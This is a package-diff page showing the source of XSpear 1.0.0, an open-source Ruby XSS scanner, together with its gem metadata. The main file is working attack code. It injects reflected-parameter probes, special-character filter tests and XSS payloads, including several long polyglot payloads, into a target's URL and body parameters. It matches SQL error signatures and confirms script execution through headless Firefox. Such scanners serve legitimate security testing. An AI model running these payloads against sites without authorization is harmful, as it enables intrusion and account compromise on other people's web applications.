RubyGems - XSpear - Versions diffs - 1.0.0 - Mend

XSpear 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (25) hide show

data/lib/XSpear.rb ADDED Viewed

@@ -0,0 +1,289 @@
+require "XSpear/version"
+require "XSpear/banner"
+require "XSpear/log"
+require "XSpear/XSpearRepoter"
+require 'net/http'
+require 'uri'
+require 'optparse'
+require 'colorize'
+require "selenium-webdriver"
+module XSpear
+  class Error < StandardError; end
+end
+class XspearScan
+  def initialize(url, data, headers, params, thread, output, verbose)
+    @url = url
+    @data = data
+    @headers = headers
+    if params.nil?
+      @params = params
+    else
+      @params = params.split(",")
+    end
+    @thread = thread
+    @output = output
+    @verbose = verbose
+    @report = XspearRepoter.new @url, Time.now
+  end
+  class ScanCallbackFunc
+    def initialize(url, method, query, response)
+      @url = url
+      @method = method
+      @query = query
+      @response = response
+      # self.run
+    end
+    def run
+      # Override callback function..
+      # return type: Array(state, message)
+      # + state: i(INFO), v(VULN), s(SYSTEM)
+      # + message: your message
+      # e.g
+      # return "v", "reflected xss with #{query}"
+    end
+  end
+  class CallbackStringMatch < ScanCallbackFunc
+    def run
+      if @response.body.include? @query
+        [true, "reflected #{@query}"]
+      else
+        [false, "not reflected #{@query}"]
+      end
+    end
+  end
+  class CallbackErrorPatternMatch < ScanCallbackFunc
+    def run
+      info = "Found"
+      if @response.body.to_s.match(/(SQL syntax.*MySQL|Warning.*mysql_.*|MySqlException \(0x|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|MySqlClient\.|com\.mysql\.jdbc\.exceptions)/i)
+        info = info + "MYSQL "
+      end
+      if @response.body.to_s.match(/(Driver.* SQL[\-\_\ ]*Server|OLE DB.* SQL Server|\bSQL Server.*Driver|Warning.*mssql_.*|\bSQL Server.*[0-9a-fA-F]{8}|[\s\S]Exception.*\WSystem\.Data\.SqlClient\.|[\s\S]Exception.*\WRoadhouse\.Cms\.|Microsoft SQL Native Client.*[0-9a-fA-F]{8})/i)
+        info = info + "MSSQL "
+      end
+      if @response.body.to_s.match(/(\bORA-\d{5}|Oracle error|Oracle.*Driver|Warning.*\Woci_.*|Warning.*\Wora_.*)/i)
+        info = info + "Oracle "
+      end
+      if @response.body.to_s.match(/(PostgreSQL.*ERROR|Warning.*\Wpg_.*|valid PostgreSQL result|Npgsql\.|PG::SyntaxError:|org\.postgresql\.util\.PSQLException|ERROR:\s\ssyntax error at or near)/i)
+        info = info + "Postgres "
+      end
+      if @response.body.to_s.match(/(Microsoft Access (\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access)/i)
+        info = info + "MSAccess "
+      end
+      if @response.body.to_s.match(/(SQLite\/JDBCDriver|SQLite.Exception|System.Data.SQLite.SQLiteException|Warning.*sqlite_.*|Warning.*SQLite3::|\[SQLITE_ERROR\])/i)
+        info = info + "SQLite "
+      end
+      if @response.body.to_s.match(/(Warning.*sybase.*|Sybase message|Sybase.*Server message.*|SybSQLException|com\.sybase\.jdbc)/i)
+        info = info + "SyBase "
+      end
+      if @response.body.to_s.match(/(Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver)/i)
+        info = info + "Ingress "
+      end
+      if info.length > 5
+        [true, "#{@info}"]
+      else
+        [false, "#{@info}"]
+      end
+    end
+  end
+  class CallbackXSSSelenium < ScanCallbackFunc
+    def run
+      begin
+      options = Selenium::WebDriver::Firefox::Options.new(args: ['-headless'])
+      driver = Selenium::WebDriver.for(:firefox, options: options)
+      if @method == "GET"
+        begin
+          driver.get(@url+"?"+@query)
+          alert = driver.switch_to().alert()
+          if alert.text.to_s == "45"
+            driver.quit
+            return [true, "found alert/prompt/confirm (45) in selenium!! #{@query}\n               => "]
+          else
+            driver.quit
+            return [true, "found alert/prompt/confirm event in selenium #{@query}\n               =>"]
+          end
+        rescue Selenium::WebDriver::Error::UnexpectedAlertOpenError => e
+          driver.quit
+          return [true, "found alert/prompt/confirm error base in selenium #{@query}\n               =>"]
+        rescue => e
+          driver.quit
+          return [false, "not found alert/prompt/confirm event #{@query}\n               =>"]
+        end
+      end
+    rescue => e
+      log('s', "Error Selenium : #{e}")
+    end
+    end
+  end
+  def run
+    r = []
+    log('s', 'creating a test query.')
+    r.push makeQueryPattern('d', 'XsPeaR"', 'XsPeaR"', 'i', "Found SQL Error Pattern", CallbackErrorPatternMatch)
+    r.push makeQueryPattern('r', 'rEfe6', 'rEfe6', 'i', 'reflected parameter', CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR>', 'XsPeaR>', 'i', "not filtered "+">".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', '<XsPeaR', '<XsPeaR', 'i', "not filtered "+"<".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR"', 'XsPeaR"', 'i', "not filtered "+'"'.blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', "XsPeaR'", "XsPeaR'", 'i', "not filtered "+"'".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', "XsPeaR`", "XsPeaR`", 'i', "not filtered "+"`".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR;', 'XsPeaR;', 'i', "not filtered "+";".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR|', 'XsPeaR|', 'i', "not filtered "+"|".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR(', 'XsPeaR(', 'i', "not filtered "+"(".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR)', 'XsPeaR)', 'i', "not filtered "+")".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR{', 'XsPeaR{', 'i', "not filtered "+"{".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR}', 'XsPeaR}', 'i', "not filtered "+"}".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR[', 'XsPeaR[', 'i', "not filtered "+"[".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR]', 'XsPeaR]', 'i', "not filtered "+"]".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR:', 'XsPeaR:', 'i', "not filtered "+":".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR.', 'XsPeaR.', 'i', "not filtered "+".".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', "not filtered "+",".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR+', 'XsPeaR+', 'i', "not filtered "+"+".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR-', 'XsPeaR-', 'i', "not filtered "+"-".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR=', 'XsPeaR=', 'i', "not filtered "+"=".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', 'XsPeaR$', 'XsPeaR$', 'i', "not filtered "+"$".blue, CallbackStringMatch)
+    r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+    r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+    r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+    r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "injected "+"<script>alert(45)</script>".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "injected "+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "running "+"XSS Polyglot payload".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "running "+"XSS Polyglot payload".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "running "+"XSS Polyglot payload".red, CallbackXSSSelenium)
+    r = r.flatten
+    r = r.flatten
+    log('s', "test query generation is complete. [#{r.length} query]")
+    log('s', "starting test and analysis. [#{@thread} threads]")
+    threads = []
+    r.each_slice(@thread) do |jobs|
+      jobs.map do |node|
+        Thread.new do
+          begin
+          result, res = task(node[:query], node[:inject], node[:pattern], node[:callback])
+          # p result.body
+          if @verbose.to_i > 2
+            log('d', "[#{res.code}] #{node[:query]} in #{node[:inject]} => #{result[1]}")
+          end
+          if result[0]
+            log(node[:category], (result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
+            @report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
+          else
+            log('d', (result[1]).to_s)
+          end
+          rescue => e
+          end
+        end
+      end.each(&:join)
+    end
+    @report.set_endtime
+    log('s', "finish scan. the report is being generated..")
+    if @output == 'json'
+      puts @report.to_json
+    else
+      @report.to_cli
+    end
+  end
+  def makeQueryPattern(type, payload, pattern, category, desc, callback)
+    # type: [r]eflected param
+    #       [f]ilted rule
+    #       [x]ss
+    #       [s]tatic
+    #       [d]ynamic
+    result = []
+    if type == 's'
+      result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": @url, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
+      unless @data.nil?
+        result.push("inject": 'body',"param":"STATIC" ,"type": type, "query": @url, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
+      end
+      p result
+    else
+      uri = URI.parse(@url)
+      begin
+        params = URI.decode_www_form(uri.query)
+        params.each do |p|
+          if @params.nil? || (@params.include? p[0] if !@params.nil?)
+            dparams = params
+            dparams.each do |d|
+              d[1] = p[1] + payload if p[0] == d[0]
+            end
+            result.push("inject": 'url',"param":p[0] ,"type": type, "query": URI.encode_www_form(dparams), "pattern": pattern, "desc": desc, "category": category, "callback": callback)
+          end
+        end
+        unless @data.nil?
+          params = URI.decode_www_form(@data)
+          params.each do |p|
+            if @params.nil? || (@params.include? p[0] if !@params.nil?)
+              dparams = params
+              dparams.each do |d|
+                d[1] = p[1] + payload if p[0] == d[0]
+              end
+              result.push("inject": 'body', "param":p[0], "type": type, "query": URI.encode_www_form(dparams), "pattern": pattern, "desc": desc, "category": category, "callback": callback)
+            end
+          end
+        end
+      rescue StandardError
+        result.push("inject": 'url',"param":"error", "type": type, "query": '', "pattern": pattern, "desc": desc, "category": category, "callback": callback)
+      end
+      result
+    end
+  end
+  def task(query, injected, pattern, callback)
+    begin
+      uri = URI.parse(@url)
+      request = nil
+      method = "GET"
+      uri.query = query if injected == 'url'
+      if @data.nil?
+        # GET
+        request = Net::HTTP::Get.new(uri.request_uri)
+      else
+        # POST
+        request = Net::HTTP::Post.new(uri.request_uri)
+        request.body = query if injected == 'body'
+        method = "POST"
+      end
+      Net::HTTP.start(uri.host, uri.port,
+                      use_ssl: uri.scheme == 'https') do |http|
+        request['Accept'] = '*/*'
+        request['Connection'] = 'keep-alive'
+        request['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0'
+        unless @headers.nil?
+          @headers.split(';').each do |header|
+            begin
+              c = header.split(': ')
+              request[c[0]] = c[1] unless c.nil?
+            rescue StandardError
+              # pass
+            end
+          end
+        end
+        response = http.request(request)
+        result = callback.new(uri.to_s, method, pattern, response).run
+        # result = result.run
+        # p request.headers
+        return result, response
+      end
+    end
+  rescue => e
+    puts e
+  end
+end

metadata ADDED Viewed

@@ -0,0 +1,168 @@
+--- !ruby/object:Gem::Specification
+name: XSpear
+version: !ruby/object:Gem::Version
+  version: 1.0.0
+platform: ruby
+authors:
+- hahwul
+autorequire:
+bindir: exe
+cert_chain: []
+date:
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: colorize
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 0.8.1
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 0.8.1
+- !ruby/object:Gem::Dependency
+  name: selenium-webdriver
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 3.142.3
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 3.142.3
+- !ruby/object:Gem::Dependency
+  name: colorize
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 0.8.1
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 0.8.1
+- !ruby/object:Gem::Dependency
+  name: selenium-webdriver
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 3.142.3
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 3.142.3
+- !ruby/object:Gem::Dependency
+  name: bundler
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '2.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '2.0'
+- !ruby/object:Gem::Dependency
+  name: rake
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '10.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '10.0'
+- !ruby/object:Gem::Dependency
+  name: rspec
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.0'
+description: XSpear is XSS Scanner on ruby gems
+email:
+- hahwul@gmail.com
+executables:
+- XSpear
+extensions: []
+extra_rdoc_files: []
+files:
+- ".gitignore"
+- ".idea/XSpear.iml"
+- ".idea/encodings.xml"
+- ".idea/misc.xml"
+- ".idea/modules.xml"
+- ".idea/workspace.xml"
+- ".rspec"
+- ".travis.yml"
+- CODE_OF_CONDUCT.md
+- Gemfile
+- LICENSE.txt
+- README.md
+- Rakefile
+- XSpear-1.0.0.gem
+- XSpear.gemspec
+- bin/console
+- bin/setup
+- exe/XSpear
+- lib/XSpear.rb
+- lib/XSpear/XSpearRepoter.rb
+- lib/XSpear/banner.rb
+- lib/XSpear/log.rb
+- lib/XSpear/version.rb
+homepage: https://github.com/hahwul/XSpear
+licenses:
+- MIT
+metadata:
+  homepage_uri: https://github.com/hahwul/XSpear
+  source_code_uri: https://github.com/hahwul/XSpear
+  changelog_uri: https://github.com/hahwul/XSpear
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.0.3
+signing_key:
+specification_version: 4
+summary: Powerfull XSS Scanning and Parameter Analysis tool&gem
+test_files: []